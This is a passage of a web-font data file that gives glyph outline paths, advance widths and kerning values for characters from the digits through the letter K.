:151,"-":-61,",":220,")":75,"(":-31,"&":63,"%":95,"$":-62,"#":23,"!":40}},"7":{"d":"608,-990r-8,1v-63,7,-174,17,-333,23v-203,8,-304,-20,-304,-76v0,-30,18,-45,53,-45v33,0,130,31,161,31v211,0,396,3,553,-23v50,-8,61,32,43,68v-102,44,-140,92,-246,227v-163,210,-353,562,-385,806v-4,23,-9,59,-15,110v-41,47,-92,28,-92,-51v0,-139,69,-328,206,-567v121,-212,244,-380,367,-504","w":730,"k":{"\u00d0":252,"\u00c1":488,"\u00c2":315,"\u00c0":688,"\u00a2":-79,"\u00d1":228,"\u00c9":449,"~":157,"z":246,"y":239,"x":88,"w":243,"v":149,"u":243,"t":241,"s":256,"r":133,"q":339,"p":189,"o":297,"n":223,"m":141,"l":-100,"k":-95,"j":302,"h":-55,"g":363,"f":76,"e":320,"d":388,"c":318,"b":-42,"a":368,"`":-57,"Y":-138,"X":-121,
"W":40,"U":-91,"T":-119,"S":83,"R":-105,"Q":-36,"P":-120,"O":-39,"K":-159,"J":-72,"I":-163,"H":-33,"G":44,"F":-51,"E":-41,"D":-37,"C":113,"A":291,"@":250,"?":53,";":500,":":425,"\/":383,".":522,"-":282,",":512,")":25,"(":66,"&":239,"%":247,"$":-105,"#":110}},"8":{"d":"694,-749v23,-2,45,49,45,75v0,47,-62,122,-185,227r-16,14v74,35,126,71,155,108v24,31,36,67,36,107v0,105,-54,190,-162,256v-89,55,-181,82,-278,82v-153,0,-230,-49,-230,-148v0,-85,102,-210,305,-374v-55,-27,-241,-74,-296,-100v-100,-47,-152,-97,-152,-158v0,-65,57,-135,172,-212v91,-61,205,-117,341,-168v121,-46,203,-69,248,-69v117,0,208,92,206,208v0,19,-8,55,-25,110v-21,69,-44,103,-67,103v-35,0,-53,-14,-53,-42v0,-16,13,-44,38,-84v25,-40,37,-76,37,-106v0,-68,-42,-102,-127,-102v-101,0,-238,44,-410,133v-183,95,-275,180,-275,255v0,29,95,70,284,124r154,50v18,5,205,-172,216,-190v16,-25,18,-18,11,-54v-2,-10,0,-21,5,-32v8,-9,16,-13,23,-13xm456,-374v-15,0,-72,48,-169,144v-103,101,-155,170,-155,205v0,49,57,73,171,73v57,0,127,-27,212,-80v96,-60,144,-121,144,-185v0,-29,-29,-63,-89,-103v-54,-36,-93,-54,-114,-54","w":832,"k":{"\u00d0":31,"\u00c1":113,"\u00c2":28,"\u00c0":349,"\u00a2":-203,"\u00c9":26,"~":-84,"y":-43,"x":-162,"w":-44,"v":-75,"u":-69,"t":24,"s":-51,"r":-71,"q":-70,"p":-73,"o":-55,"n":-68,"m":-126,"l":-163,"k":-170,"i":-116,"h":-131,"g":-43,"f":-73,"e":-73,"c":-66,"b":-136,"a":-36,"`":-121,"Z":-86,"Y":-227,"X":-126,"W":-202,"V":-201,"U":-214,"T":-226,"S":-148,"R":-257,"Q":-142,"P":-254,"O":-142,"N":-217,"M":-231,"L":-53,"K":-232,"J":-79,"I":-198,"H":-59,"G":-120,"F":-232,"E":-237,"D":-249,"C":-105,"B":-251,"A":-59,"?":-163,";":204,":":139,"\/":47,".":100,"-":50,",":176,")":28,"(":-82,"&":24,"%":28,"$":-219,"#":-109,"!":-63}},"9":{"d":"187,-201v-3,0,-13,-3,-19,-5v-70,0,-122,-40,-156,-119v-23,-54,-34,-112,-34,-175v0,-115,43,-240,129,-377v95,-150,194,-225,298,-225v103,0,176,58,224,173v40,96,58,233,50,376v-11,172,-58,337,-142,494v-105,196,-230,294,-374,294v-28,0,-62,-10,-103,-29v-51,-25,-77,-53,-77,-86v0,-37,35,-36,54,-17v43,42,83,62,117,62v143,0,260,-122,350,-367v66,-180,99,-334,99,-463v0,-69,-9,-136,-29,-202v-33,-108,-86,-162,-157,-162v-24,0,-68,25,-133,72v-122,87,-211,292,-210,501v0,122,40,183,120,183v81,0,156,-56,225,-167v63,-102,95,-201,95,-296v0,-62,-17,-101,-52,-118v-24,-11,-19,-37,2,-52v12,-9,22,-12,31,-8v76,43,90,96,89,227v0,91,-36,190,-107,297v-83,126,-180,189,-290,189","w":762,"k":{"\u00d0":-71,"\u00c1":149,"\u00c2":52,"\u00c0":349,"\u00a2":-128,"\u00d1":-96,"\u00c9":97,"~":21,"z":-24,"x":-79,"w":-36,"v":-103,"u":-41,"t":-37,"s":-70,"r":-84,"p":-38,"o":-26,"n":-51,"m":-127,"l":-65,"k":-85,"j":71,"i":-39,"h":-55,"f":-61,"e":-32,"d":65,"c":-29,"b":-81,"`":56,"Z":40,"Y":-63,"W":-131,"V":-88,"U":-75,"T":-78,"S":-96,"R":-118,"Q":-98,"P":-114,"O":-102,"N":-118,"M":-122,"L":79,"K":-140,"J":-48,"I":-32,"H":-39,"G":-83,"F":-101,"E":-110,"D":-140,"C":-85,"B":-162,"A":-32,"?":-54,";":201,":":118,"\/":108,".":171,"-":-48,",":238,")":205,"(":-36,"&":64,"%":91,"$":-99,"!":24}},":":{"d":"251,-408v-32,1,-73,-30,-73,-62v0,-35,18,-52,53,-52v53,0,79,15,79,45v0,46,-20,69,-59,69xm187,60v-33,1,-73,-30,-73,-62v0,-35,18,-52,53,-52v52,0,78,15,78,44v0,47,-19,70,-58,70","w":299,"k":{"\u00d0":-162,"\u00c2":-43,"\u00c0":146,"\u00a2":-176,"\u00d1":-186,"\u00c9":-61,"~":252,"z":-122,"y":-28,"x":-116,"w":-156,"v":-161,"u":-136,"t":-131,"s":-155,"r":-160,"q":-156,"p":-135,"o":-114,"n":-147,"m":-220,"l":-153,"k":-184,"j":-229,"i":-142,"h":-153,"g":-109,"f":-56,"e":-131,"d":-129,"c":-116,"b":-183,"a":-136,"`":236,"Z":-157,"Y":95,"X":-157,"W":81,"V":134,"U":-70,"T"
:119,"S":-154,"R":80,"Q":-204,"P":83,"O":-204,"N":101,"M":79,"L":-81,"K":-230,"J":-148,"I":-50,"H":-116,"G":-202,"F":-150,"E":-121,"D":72,"C":-196,"B":-124,"A":-112,"@":-106,"?":168,";":252,":":26,"9":-139,"8":-91,"7":-54,"6":-151,"5":-133,"4":-106,"3":-142,"2":-150,"1":122,"0":-202,"\/":-106,"-":-132,",":56,")":204,"(":-141,"%":-105,"$":-155,"#":-91,"!":-59}},";":{"d":"340,-430v-32,0,-73,-29,-73,-62v0,-35,18,-52,53,-52v53,0,79,15,79,45v0,46,-20,69,-59,69xm109,190v-30,11,-45,4,-45,-21v0,-14,10,-25,29,-32v52,-22,104,-120,113,-192v3,-21,24,-32,63,-32v29,0,44,13,43,39v-1,35,-23,79,-66,131v-45,54,-90,90,-137,107","w":446,"k":{"\u00d0":-75,"\u00c1":107,"\u00c2":36,"\u00c0":322,"\u00a2":-108,"\u00d1":-103,"~":448,"z":-32,"y":-25,"x":-23,"w":-80,"v":-95,"u":-58,"t":-49,"s":-74,"r":-90,"q":-54,"p":-61,"o":-31,"n":-71,"m":-145,"l":-79,"k":-103,"j":-46,"i":-65,"h":-79,"f":37,"e":-44,"d":-35,"c":-32,"b":-104,"a":-44,"`":431,"Z":-53,"Y":86,"X":-62,"W":264,"V":320,"U":22,"T":304,"S":-92,"R":86,"Q":-120,"P":26,"O":-125,"N":284,"M":274,"K":-156,"J":33,"I":41,"H":-39,"G":-113,"F":-23,"E":-31,"C":-113,"B":-30,"@":-33,"?":348,";":179,":":101,"9":-72,"8":-40,"7":40,"6":-71,"5":-67,"3":-73,"2":-54,"1":32,"0":-124,".":85,"-":-45,",":130,")":133,"(":-63,"&":88,"$":-81}},"<":{},"=":{},">":{},"?":{"d":"281,-132v-63,0,-113,-57,-112,-118v0,-55,46,-128,148,-207r275,-212v99,-80,148,-144,148,-193v0,-89,-68,-134,-203,-134v-72,0,-154,22,-246,67v-61,29,-130,71,-207,124v-64,45,-98,67,-101,67v-29,0,-44,-16,-44,-48v0,-34,56,-83,168,-147v96,-55,168,-90,216,-103v73,-20,145,-30,216,-30v186,0,279,69,279,208v0,80,-66,173,-199,278v-32,25,-86,65,-162,119v-142,101,-213,174,-213,220v0,22,10,34,31,37v36,5,54,16,54,33v0,26,-16,39,-48,39xm324,85v0,20,-49,50,-70,50v-41,0,-62,-15,-62,-46v0,-37,22,-56,65,-56v45,0,67,17,67,52","w":855,"k":{"\u00d0":254,"\u00c1":486,"\u00c2":214,"\u00c0":832,"\u00a2":-101,"\u00d1":228,"\u00c9":930,"z":176,"y":116,"x":-31,"w":167,"v":61,"u":142,"t":148,"s":192,"r":21,"q":312,"p":72,"o":213,"n":155,"m":45,"l":-42,"k":-51,"j":105,"g":297,"f":98,"e":240,"d":354,"c":237,"a":344,"`":-26,"Z":42,"Y":-95,"X":22,"W":-86,"V":-91,"U":-88,"T":-95,"S":-23,"R":-131,"Q":-25,"P":-127,"O":-25,"N":-101,"M":-123,"L":73,"K":-113,"J":93,"I":-48,"H":72,"F":-112,"E":-121,"D":-132,"C":41,"B":-129,"A":270,"@":133,"?":-46,";":460,":":401,"8":-68,"6":78,"4":81,"3":66,"2":-104,"1":-28,"0":-37,"\/":340,".":1003,"-":284,",":500,")":219,"(":39,"&":154,"%":247,"$":-118,"!":56}},"@":{"d":"874,-300v0,-31,-13,-61,-16,-93v-3,-30,34,-32,45,-6v63,141,28,260,-94,341v-179,119,-444,92,-608,-37v-110,-87,-167,-192,-167,-323v0,-119,51,-227,154,-324v100,-95,208,-142,324,-142v78,0,152,24,218,76v89,70,141,149,141,286v0,90,-24,165,-72,225v-52,65,-115,85,-188,59v-42,-15,-63,-65,-62,-148v-117,146,-210,219,-278,219v-37,0,-56,-23,-56,-68v0,-85,56,-194,169,-327v113,-133,197,-182,251,-147v17,11,26,34,26,67v0,42,-15,63,-44,67v-21,3,-42,-14,-33,-34v7,-18,11,-34,10,-48v0,-4,2,-6,5,-7v-38,7,-103,69,-193,185v-90,116,-135,195,-135,237v0,14,6,21,19,21v29,0,82,-46,158,-138v41,-51,117,-125,125,-192v3,-21,15,-32,37,-32v30,0,42,14,37,43v-21,107,-32,172,-32,193v2,46,7,65,43,64v44,0,83,-31,110,-95v89,-210,-38,-449,-256,-448v-99,0,-192,42,-278,126v-86,84,-128,179,-128,282v0,216,213,379,437,379v169,0,331,-104,331,-261","w":1024,"k":{"\u00d0":-51,"\u00c1":133,"\u00c0":334,"\u00a2":-60,"\u00d1":-72,"\u00c9":77,"~":143,"y":-56,"w":-45,"v":-44,"u":-73,"t":-21,"s":-74,"r":-60,"q":-67,"p":-56,"o":-60,"n":-74,"m":-138,"l":-57,"k":-93,"j":115,"i":-45,"h":-68,"g":-50,"f":-81,"e":-73,"c
":-70,"b":-100,"a":-22,"`":394,"Y":44,"X":-25,"W":-82,"V":35,"T":288,"S":-38,"R":100,"Q":-110,"P":50,"O":-110,"N":-24,"M":-32,"L":89,"K":-135,"J":282,"I":160,"H":-25,"G":-112,"F":-94,"E":-26,"C":-112,"B":-82,"A":-66,"?":84,";":233,":":170,"9":-34,"8":-52,"7":63,"6":-67,"5":-54,"4":-93,"3":-22,"1":52,"0":-107,"\/":73,".":151,"-":-32,",":202,")":191,"(":-45,"&":24,"%":63,"#":56,"!":41}},"A":{"d":"1096,61v0,34,-71,63,-108,62v-121,-2,-200,-182,-237,-544v-106,-8,-170,8,-324,41v-116,25,-175,43,-178,51r-107,252r-81,206v-26,64,-54,96,-85,96v-35,0,-52,-19,-52,-58v0,-17,53,-128,158,-334v27,-53,46,-92,57,-119v-36,14,-67,30,-94,48v-11,7,-25,11,-41,11v-33,0,-49,-17,-49,-50v0,-23,32,-49,98,-71r130,-43r57,-121v38,-85,95,-213,178,-379v78,-157,159,-234,234,-234v65,0,117,97,130,162v18,89,36,241,51,457v131,11,196,57,196,137v0,29,-12,49,-35,61v-44,23,-56,-22,-35,-61v0,-36,-43,-54,-130,-54v8,0,13,8,16,23v43,303,90,454,141,454v30,0,48,-34,74,-34v24,0,36,12,36,41xm714,-826v-19,-145,-50,-217,-83,-217v-33,0,-94,93,-183,280v-31,65,-79,176,-146,333v160,-46,308,-74,443,-84v-5,-66,-12,-170,-31,-312","w":1123,"k":{"\u00d0":-68,"\u00c0":303,"\u00a2":-28,"\u00d1":-85,"\u00c9":69,"~":243,"z":-106,"x":-109,"w":-76,"u":-119,"t":-23,"s":-80,"r":-115,"q":-68,"p":-95,"o":-71,"n":-149,"m":-179,"l":-41,"k":-72,"j":78,"i":-38,"h":-101,"g":41,"f":-58,"e":-90,"d":-76,"c":-73,"b":-70,"a":-122,"`":261,"Z":-111,"Y":41,"X":-137,"W":68,"V":110,"U":-54,"T":112,"R":75,"Q":-82,"P":53,"O":-89,"N":78,"M":77,"L":-126,"K":-119,"J":181,"I":-83,"H":-122,"G":-65,"F":-70,"D":48,"C":-77,"B":-109,"A":-90,"?":117,";":70,":":41,"9":-40,"7":-30,"6":-60,"5":-116,"4":-21,"3":-90,"2":-143,"1":-64,"0":-80,"\/":-81,".":142,"-":-46,",":21,")":21,"&":85,"%":-99,"$":-20,"#":89,"!":48}},"B":{"d":"803,-937v0,-68,-91,-100,-170,-100v-190,0,-398,105,-623,314v-47,43,-75,65,-86,65v-33,0,-49,-18,-49,-54v0,-25,41,-70,122,-135v219,-174,428,-261,625,-261v186,0,279,64,279,192v0,87,-79,197,-238,330v118,-21,238,-22,333,26v72,36,108,85,108,150v0,111,-88,230,-263,357v-157,113,-296,178,-415,194v-145,19,-229,29,-254,29v-135,0,-202,-45,-202,-136v0,-57,23,-100,69,-129v47,3,31,-2,47,39v-29,33,-44,63,-44,90v0,31,44,46,132,46v132,0,276,-33,432,-98v76,-31,162,-88,257,-169v109,-92,163,-166,163,-221v0,-69,-68,-103,-203,-103v-99,0,-201,17,-302,55v-58,22,-192,95,-235,95v-39,0,-58,-7,-58,-21v0,-19,31,-47,92,-82v322,-183,483,-340,483,-473xm240,-752v-70,125,-100,305,-100,532v0,97,35,155,104,175v29,26,19,60,-31,60v-49,0,-90,-38,-121,-115v-25,-60,-37,-117,-37,-172v0,-71,15,-179,45,-326v35,-175,71,-262,108,-262v59,-1,57,63,32,108","w":1171,"k":{"\u00d0":-102,"\u00c1":134,"\u00c2":40,"\u00c0":336,"\u00a2":-84,"\u00d1":-125,"\u00c9":180,"~":276,"y":-20,"x":63,"w":-41,"v":-51,"u":-54,"t":-40,"s":-80,"r":-63,"p":-43,"o":-38,"n":-62,"m":-136,"l":-55,"k":-83,"j":103,"i":-41,"h":-54,"f":-68,"e":-36,"d":80,"c":-37,"b":-83,"a":37,"`":199,"Z":106,"Y":68,"X":38,"W":124,"V":102,"U":37,"T":66,"S":-53,"R":35,"Q":-98,"P":39,"O":-103,"N":93,"M":81,"L":98,"K":-132,"J":211,"I":89,"H":-39,"G":-96,"F":-90,"E":-29,"D":33,"C":-89,"A":-34,"?":138,";":208,":":110,"9":-48,"7":106,"6":-43,"5":-73,"4":-48,"3":69,"2":79,"1":53,"0":-97,"\/":153,".":254,"-":-78,",":316,")":234,"(":-34,"&":67,"%":135,"$":-64,"#":21,"!":34}},"C":{"d":"757,-1054v2,32,-33,61,-63,60v-3,0,-22,-8,-55,-23v-33,-15,-61,-23,-84,-23v-110,0,-227,103,-352,308v-116,192,-174,353,-174,482v0,91,14,167,43,227v36,75,91,113,164,113v62,0,134,-24,215,-71v121,-70,225,-186,311,-350v25,-48,64,-59,78,2v-3,36,-123,231,-146,260v-88,115,-262,235,-441,239v-175,4,-314,-17
7,-314,-358v0,-169,17,-255,95,-431v64,-146,148,-266,243,-362v110,-111,219,-166,327,-166v46,0,160,50,153,93","w":849,"k":{"\u00d0":613,"\u00c1":66,"\u00c0":264,"\u00a2":78,"\u00d1":590,"\u00c9":30,"~":565,"z":27,"y":-51,"x":29,"w":-60,"v":-22,"u":-82,"t":90,"s":-97,"r":-76,"q":-39,"p":-70,"o":-66,"n":-90,"m":-158,"l":-78,"k":-110,"j":94,"i":-59,"h":-84,"g":-24,"f":-101,"e":-66,"d":42,"c":-67,"b":-113,"`":139,"Z":34,"W":210,"V":124,"S":69,"R":21,"Q":-124,"O":-127,"N":131,"M":137,"L":70,"K":-154,"J":45,"I":-43,"H":50,"G":-123,"F":-114,"E":33,"C":-120,"B":-29,"A":-72,"?":127,";":232,":":331,"9":-57,"8":87,"6":-74,"5":49,"4":-86,"3":-23,"2":41,"1":31,"0":-119,"\/":106,".":104,"-":639,",":173,")":146,"(":-59,"&":35,"%":88,"$":52,"#":200}},"D":{"d":"491,149v-67,0,-114,-12,-142,-33v-25,-19,8,-56,31,-51v46,10,69,14,70,14v145,0,285,-73,418,-219v131,-143,196,-288,196,-435v0,-120,-49,-216,-146,-290v-157,-120,-384,-125,-605,-60v-101,29,-185,66,-253,113v-68,47,-106,70,-115,70v-39,0,-58,-18,-58,-54v0,-23,30,-52,89,-86v192,-112,398,-168,618,-168v142,0,267,42,376,125v119,91,179,207,179,347v0,170,-66,332,-197,485v-137,161,-291,242,-461,242xm97,-469v0,-65,45,-383,93,-373v36,0,54,20,54,59v0,29,-29,133,-30,144v-19,105,-29,200,-29,286v0,283,49,424,148,424v13,0,26,-2,40,-7v-30,53,-57,80,-81,80v-68,0,-119,-67,-156,-201v-38,-137,-39,-254,-39,-412","w":1184,"k":{"\u00d0":-114,"\u00c1":118,"\u00c0":323,"\u00a2":-167,"\u00d1":-139,"\u00c9":127,"z":-62,"y":-53,"x":-107,"w":-74,"v":-141,"u":-76,"t":-74,"s":-105,"r":-121,"q":-27,"p":-81,"o":-57,"n":-89,"m":-165,"l":-100,"k":-125,"j":30,"i":-75,"h":-92,"f":-89,"e":-54,"d":56,"c":-54,"b":-118,"`":131,"Z":54,"Y":-25,"W":-176,"V":-107,"U":-45,"T":-28,"S":-135,"R":-89,"Q":-138,"P":-85,"O":-137,"N":-142,"M":-156,"L":48,"K":-176,"J":243,"I":103,"H":-71,"G":-132,"F":-120,"E":-116,"D":-148,"C":-122,"B":-192,"A":-57,"@":-58,"?":-62,";":165,":":80,"9":-99,"8":-154,"7":88,"6":-77,"5":-105,"4":-70,"2":-139,"0":-140,"\/":127,".":201,"-":-91,",":263,")":214,"(":-76,"&":49,"%":108,"$":-119,"#":-33}},"E":{"d":"618,-1112v98,-13,199,26,200,110v0,24,-8,50,-25,78v-9,16,-21,24,-34,24v-29,0,-24,-32,-24,-58v0,-57,-34,-57,-105,-57v-108,0,-260,35,-457,104v-9,3,-44,27,-107,69v-63,42,-98,63,-106,63v-35,0,-53,-18,-53,-53v0,-31,71,-77,214,-138v98,-42,191,-77,280,-105v30,-9,102,-22,217,-37xm287,125v-142,-7,-180,-82,-180,-241v0,-51,11,-211,11,-258v-34,19,-56,29,-67,29v-29,0,-44,-19,-44,-57v0,-22,38,-50,114,-85v3,-49,9,-130,21,-243v15,-141,44,-212,81,-212v36,0,54,21,54,64r-25,107v-14,63,-29,150,-45,261v23,-3,198,-66,250,-66v99,0,157,24,172,71r-9,46v-27,2,-47,-6,-61,-25v-8,-12,-32,-18,-71,-18v-42,0,-289,51,-286,81v-18,69,-2,221,0,310v3,100,16,159,99,159v44,0,115,-13,212,-38v101,-27,179,-40,233,-40v93,0,189,72,184,165r-44,25v-31,-71,-88,-106,-171,-106v-86,0,-343,75,-428,71","w":970,"k":{"\u00d0":318,"\u00c1":64,"\u00c2":65,"\u00c0":304,"\u00a2":104,"\u00d1":308,"\u00c9":62,"~":655,"y":56,"x":-26,"w":24,"v":173,"t":220,"p":-34,"o":29,"n":-55,"m":-85,"l":36,"j":138,"i":50,"h":-40,"g":52,"f":94,"c":27,"b":31,"a":-29,"`":130,"Z":-49,"Y":21,"X":-79,"W":159,"V":112,"T":24,"S":62,"Q":23,"N":133,"M":109,"L":-79,"K":-42,"J":131,"I":-28,"H":-103,"F":52,"E":73,"D":106,"B":-47,"A":-51,"@":291,"?":179,";":79,":":149,"9":-25,"8":62,"7":30,"5":-57,"4":221,"3":-20,"2":-80,"1":-48,"0":39,"\/":-36,".":139,"-":357,")":42,"(":51,"&":163,"%":-54,"$":72,"#":299,"!":114}},"F":{"d":"701,-1135v99,0,210,44,210,131v0,40,-15,63,-44,69v-17,-9,-26,-26,-26,-51v0,-39,-53,-59,-160,-59v-110,0,-368,71,-454,110v-10,4,-155,87,-205,114v-21,12
,-36,19,-47,22v-33,0,-49,-17,-49,-51v0,-35,35,-66,105,-93v323,-128,546,-192,670,-192xm239,-881v0,151,-75,270,-75,401v33,-3,151,-33,189,-33v63,0,165,26,161,80r-25,27v-32,0,-86,-35,-121,-36v-37,-2,-213,21,-208,46v0,364,41,539,123,526v31,-5,54,7,54,34v0,19,-34,39,-55,38v-139,0,-209,-183,-211,-550r-14,7v-39,21,-61,32,-65,32v-33,0,-50,-15,-50,-44v0,-28,15,-54,50,-66r86,-30v11,-52,33,-337,35,-343v16,-93,43,-140,80,-140v31,0,46,17,46,51","w":648,"k":{"\u00c1":264,"\u00c2":136,"\u00c0":630,"\u00a2":-274,"\u00d1":-32,"\u00c9":330,"~":372,"z":153,"y":74,"x":147,"w":52,"v":37,"u":48,"t":52,"s":24,"r":25,"q":135,"p":42,"o":73,"n":37,"m":-41,"l":-281,"k":-281,"j":263,"i":-221,"h":-242,"g":137,"f":-120,"e":86,"d":194,"c":82,"b":-233,"a":177,"`":-236,"Z":-207,"Y":-345,"X":-290,"W":-159,"V":-224,"U":-306,"T":-344,"S":-137,"R":-329,"Q":-238,"P":-341,"O":-239,"N":-187,"M":-214,"L":-182,"K":-343,"J":-243,"I":-341,"H":-205,"G":-159,"F":-231,"E":-212,"D":-176,"C":-98,"B":-171,"A":88,"@":75,"?":-119,";":261,":":205,"9":-154,"8":-90,"7":-303,"6":-53,"5":-179,"4":-142,"3":-90,"2":-83,"1":-208,"0":-204,"\/":139,".":403,",":251,")":-143,"(":-138,"&":25,"%":40,"$":-305,"#":87,"!":-170}},"G":{"d":"760,-1124v0,30,-31,69,-63,51v-43,-24,-84,-38,-125,-38v-71,0,-146,39,-225,117v-93,91,-169,202,-228,332v-60,134,-90,264,-90,390v0,81,18,157,55,227v43,82,99,123,166,123v147,0,293,-91,437,-273v130,-165,202,-320,215,-464v4,-47,-4,-71,-23,-71v-25,0,-150,68,-376,205v-46,28,-74,42,-84,42v-31,0,-47,-16,-47,-49v0,-35,78,-91,235,-167v149,-72,244,-108,285,-108v67,0,101,40,101,121v1,46,-18,118,-25,165v-36,242,-51,426,-51,550v0,113,19,168,58,163v34,-5,51,6,51,33v0,28,-18,42,-55,42v-100,0,-150,-92,-150,-276v0,-60,11,-150,32,-269v-83,145,-161,246,-233,306v-99,83,-221,125,-368,125v-102,0,-182,-53,-240,-159v-47,-85,-70,-180,-70,-283v0,-193,61,-388,182,-586v138,-226,300,-339,487,-339v51,0,149,43,149,90","w":1091,"k":{"\u00d0":-34,"\u00c2":68,"\u00c0":123,"\u00a2":-69,"\u00d1":-59,"\u00c9":48,"~":67,"z":-20,"x":-66,"v":-86,"u":-29,"s":-43,"r":-70,"q":-30,"p":-97,"n":-43,"m":-99,"l":-23,"k":-38,"j":57,"e":-29,"d":50,"c":-23,"b":-27,"a":-20,"`":384,"Y":120,"X":-27,"W":-85,"V":-47,"U":62,"T":307,"S":-50,"R":147,"Q":-40,"P":75,"O":-41,"N":-81,"M":-77,"L":-32,"K":-97,"J":-370,"I":26,"H":-57,"G":-26,"F":-31,"E":-33,"D":-99,"C":-32,"B":-127,"A":-83,"@":25,";":69,":":131,"8":-80,"7":80,"5":-22,"3":-25,"2":-92,"1":-34,"0":-52,"\/":-24,".":121,",":71,")":53,"&":96,"%":-41,"$":-29,"#":59,"!":68}},"H":{"d":"-8,194v-35,0,-102,-36,-97,-72v0,-2,3,-13,9,-33r41,0v15,22,28,33,40,33v61,0,108,-77,141,-231v19,-90,31,-183,35,-280v-59,30,-98,45,-118,45v-29,0,-43,-15,-43,-46v0,-25,19,-45,58,-61v9,-3,39,-12,90,-26v5,1,9,2,13,3v7,-151,0,-119,-4,-317v-2,-70,-15,-159,-44,-267v-14,-54,-8,-113,49,-113v28,0,49,67,70,201v27,174,17,289,22,461v149,-47,266,-75,351,-83v227,-20,177,-25,306,-14v11,-100,31,-205,60,-316v39,-146,78,-219,116,-219v52,0,51,75,34,122v-13,36,-33,78,-48,128v-26,87,-60,204,-64,299v41,19,68,34,83,47v26,22,39,51,39,86v0,33,-30,77,-59,76v-17,0,-28,-13,-33,-39r20,-42v-5,-21,-24,-35,-58,-43v-12,24,6,281,10,314v18,144,51,216,98,216v13,0,24,-7,34,-20r47,0v5,21,8,33,8,35v3,31,-57,61,-89,60v-96,0,-158,-85,-187,-255v-7,-42,-14,-162,-21,-360v-224,-18,-347,13,-649,94v-6,83,-24,196,-54,341v-39,184,-107,276,-206,276","w":1270,"k":{"\u00c1":63,"\u00c2":25,"\u00c0":368,"\u00a2":-41,"\u00d1":-41,"~":167,"z":-87,"x":-68,"w":-48,"u":-89,"s":-56,"r":-79,"q":-61,"p":-55,"o":-52,"n":-111,"m":-144,"l":-22,"k":-47,"j":117,"h":-69,"f":63,"e":-71,"d":-36,"c":-57,"b":-27,"a":-78,"`":9
4,"Z":-77,"X":-102,"W":35,"V":30,"U":-22,"R":-33,"Q":-38,"P":-30,"O":-45,"L":-78,"K":-99,"J":59,"I":-33,"G":-26,"D":-23,"C":-59,"B":-77,"A":-49,"@":39,"?":63,";":135,":":63,"6":-36,"5":-82,"4":40,"3":-72,"2":-106,"0":-45,"\/":-34,".":80,",":99,")":70,"&":93,"%":-51,"#":72,"!":83}},"I":{"d":"474,-1205v82,0,252,45,252,114v0,76,-53,62,-69,11v-11,-34,-64,-50,-155,-50v-183,0,-413,98,-519,155v-28,15,-54,-6,-54,-42v0,-40,81,-83,242,-128v141,-40,242,-60,303,-60xm397,-44v83,0,161,-5,233,19v69,23,104,56,104,99v0,36,-13,41,-60,40v-10,-57,-67,-86,-171,-86v-119,0,-259,35,-419,104v-33,14,-53,21,-60,21v-35,0,-52,-18,-52,-53v0,-39,108,-80,325,-125v-53,-69,-80,-209,-80,-419v0,-143,13,-289,31,-437v5,-42,8,-105,20,-187v3,-23,38,-63,65,-63v39,0,54,24,47,71v-51,317,-76,537,-76,660v0,57,3,111,8,164v13,128,42,192,85,192","w":737,"k":{"\u00d0":263,"\u00c0":294,"\u00d1":239,"\u00c9":-37,"~":339,"z":-102,"y":-34,"x":-101,"w":-66,"v":86,"u":-107,"t":124,"s":-70,"r":-104,"q":-92,"p":-98,"o":-66,"n":-136,"m":-167,"l":-46,"k":-75,"j":75,"i":-30,"h":-102,"g":-37,"f":31,"e":-86,"d":-72,"c":-71,"b":-53,"a":-108,"`":299,"Z":-110,"Y":-48,"X":-146,"W":181,"V":195,"U":-54,"T":37,"Q":-58,"O":-64,"N":97,"M":97,"L":-128,"K":-118,"J":-31,"I":-101,"H":-49,"G":-62,"E":32,"D":56,"C":-82,"B":-109,"A":-97,"@":255,"?":123,";":74,":":48,"9":158,"7":-78,"6":-60,"5":-117,"4":102,"3":-96,"2":-142,"1":-50,"0":-38,"\/":-80,".":40,"-":287,"&":76,"%":-98,"#":202,"!":52}},"J":{"d":"575,-1246v81,0,178,53,173,129v0,9,-5,21,-15,35v-18,23,-35,23,-52,2v6,-79,-42,-92,-134,-92v-97,0,-240,40,-429,121v-33,15,-52,22,-58,22v-35,0,-53,-14,-53,-43v0,-42,84,-83,251,-123v141,-34,247,-51,317,-51xm325,173v-36,81,-86,155,-150,221v-79,81,-157,125,-236,130r-74,5v-67,0,-134,-27,-201,-80v-71,-57,-103,-120,-108,-189v-5,-63,55,-86,62,-24v12,100,118,201,228,201v184,0,322,-109,414,-328v69,-165,103,-360,103,-585v0,-192,-14,-392,-46,-601v-6,-38,25,-83,63,-83v27,0,45,14,54,41v3,10,5,34,6,72v5,130,8,243,8,338v0,401,-41,695,-123,882","w":704,"k":{"\u00d0":94,"\u00c1":265,"\u00c2":194,"\u00c0":362,"\u00a2":-36,"\u00d1":70,"\u00c9":186,"~":192,"z":123,"y":101,"x":84,"w":124,"v":64,"u":100,"t":123,"s":85,"r":83,"q":126,"p":129,"o":115,"n":100,"m":34,"l":-101,"k":-95,"j":-110,"i":120,"h":-51,"g":143,"f":82,"e":98,"d":163,"c":104,"b":-29,"a":123,"`":187,"Z":124,"Y":-61,"X":-175,"W":38,"V":66,"U":-28,"S":65,"R":-32,"P":-53,"N":40,"M":41,"K":-142,"J":-116,"I":-145,"H":-51,"G":72,"F":47,"E":39,"C":63,"A":103,"@":149,"?":105,";":284,":":272,"9":99,"8":44,"7":-122,"6":109,"5":82,"4":63,"3":81,"2":38,"1":126,"0":59,"\/":166,".":259,"-":118,",":262,"(":105,"&":199,"%":148,"$":-54,"#":163,"!":36}},"K":{"d":"876,-6v3,51,-114,89,-174,85v-95,-7,-215,-95,-360,-272v-35,-44,-86,-107,-157,-185v-53,-58,-105,-91,-154,-103r-6,-43v34,-28,44,-24,90,-27v66,-5,145,-47,238,-120v79,-62,146,-127,199,-196r25,-43v68,-120,112,-178,132,-178v22,0,47,37,46,56v-2,33,-47,105,-131,221v-74,102,-290,271,-417,312v11,9,51,60,120,152v57,76,120,147,189,213v95,91,171,141,226,141v47,0,58,-23,114,-46xm144,148v-69,0,-123,-44,-162,-132v-40,-91,-55,-184,-55,-319v0,-171,11,-339,33,-502v27,-203,62,-304,106,-304v37,0,54,20,51,61v-85,214,-112,496,-99,813v2,43,12,102,34,177v27,90,54,135,83,135v26,0,48,5,66,17v-4,36,-23,54,-57,54","w":768,"k":{"\u00d0":300,"\u00c1":-93,"\u00c2":-113,"\u00c0":238,"\u00a2":-43,"\u00d1":279,"\u00c9":-202,"~":120,"z":-208,"y":-170,"x":-204,"w":-178,"v":-30,"u":-214,"s":-182,"r":-203,"q":-220,"p":-195,"o":-186,"n":-229,"m":-267,"l":-169,"k":-205,"j":-23,"i":-160